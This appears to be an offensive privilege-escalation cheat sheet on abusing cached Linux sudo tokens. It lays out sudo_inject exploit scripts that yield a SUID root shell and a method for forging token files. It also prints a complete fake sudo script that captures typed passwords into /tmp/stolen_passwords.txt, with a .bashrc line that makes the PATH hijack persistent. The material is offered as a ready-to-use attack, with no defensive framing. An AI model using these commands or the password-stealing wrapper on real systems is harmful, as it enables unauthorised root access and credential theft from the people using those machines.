Sudo Token Reuse

Overview

After a user runs sudo and enters their password, a token is cached (default 15 minutes). If you have access to that user’s session, you can reuse the token without knowing the password.

Requirements

User is in sudo group
User has recently used sudo (token not expired)
You have code execution as that user
ptrace_scope allows process injection OR /proc/sys/kernel/yama/ptrace_scope = 0

Check ptrace_scope

cat /proc/sys/kernel/yama/ptrace_scope

Value	Meaning
`0`	Any process can ptrace any other (exploitable)
`1`	Only parent can ptrace child
`2`	Only admin can ptrace
`3`	No ptrace at all

Check Token Existence

ls -la /var/run/sudo/ts/
ls -la /var/run/sudo/ts/$(whoami)

sudo_inject

https://github.com/nongiach/sudo_inject

exploit.sh — Process Injection

Injects into a process owned by target user to activate sudo token:

./exploit.sh

Creates /tmp/sh — SUID shell:

/tmp/sh -p

exploit_v2.sh — No ptrace Required

Uses /proc/pid/mem instead of ptrace:

./exploit_v2.sh

exploit_v3.sh — Via Shared Library

Loads shared library into user process:

./exploit_v3.sh
/tmp/sh -p

Manual Token Abuse

Write sudo_inject Token

If you can write to /var/run/sudo/ts/<username>:

ls -la /var/run/sudo/ts/

If writable, create a valid token entry. The token format is binary — use write_sudo_token:

https://github.com/nongiach/sudo_inject/blob/master/extra_tools/write_sudo_token.c

gcc write_sudo_token.c -o write_sudo_token
./write_sudo_token
sudo su

Timestamp Directory Permissions

Default: /var/run/sudo/ts/ owned by root with 0700. If misconfigured (writable):

ls -la /var/run/sudo/
# drwxrwxrwx = exploitable

Sudo Timestamp Timeout

Check timeout:

sudo -l | grep timestamp
cat /etc/sudoers | grep timestamp_timeout

Default: 15 minutes. -1 = never expires (always exploitable if token exists).

Sudo Hijacking (PATH)

Create fake sudo in writable PATH directory:

cat > /tmp/sudo << 'EOF'
#!/bin/bash
/usr/bin/sudo -n true 2>/dev/null
if [ $? -eq 0 ]; then
    /usr/bin/sudo /bin/bash
else
    read -sp "[sudo] password for $(whoami): " pass
    echo "$pass" >> /tmp/stolen_passwords.txt
    echo "$pass" | /usr/bin/sudo -S "$@"
fi
EOF
chmod +x /tmp/sudo
export PATH=/tmp:$PATH

Next time user types sudo — either reuses token or captures password.

Persistent via .bashrc

echo 'export PATH=/tmp:$PATH' >> ~/.bashrc

Quick Reference

Technique	Requirement
sudo_inject (ptrace)	ptrace_scope = 0, active sudo token
sudo_inject v2 (/proc/mem)	/proc/pid/mem readable
Write sudo token	Writable /var/run/sudo/ts/
Sudo hijacking	Writable PATH dir, user runs sudo

Documentation Index

​Overview

​Requirements

​Check ptrace_scope

​Check Token Existence

​sudo_inject

​exploit.sh — Process Injection

​exploit_v2.sh — No ptrace Required

​exploit_v3.sh — Via Shared Library

​Manual Token Abuse

​Write sudo_inject Token

​Timestamp Directory Permissions

​Sudo Timestamp Timeout

​Sudo Hijacking (PATH)

​Persistent via .bashrc

​Quick Reference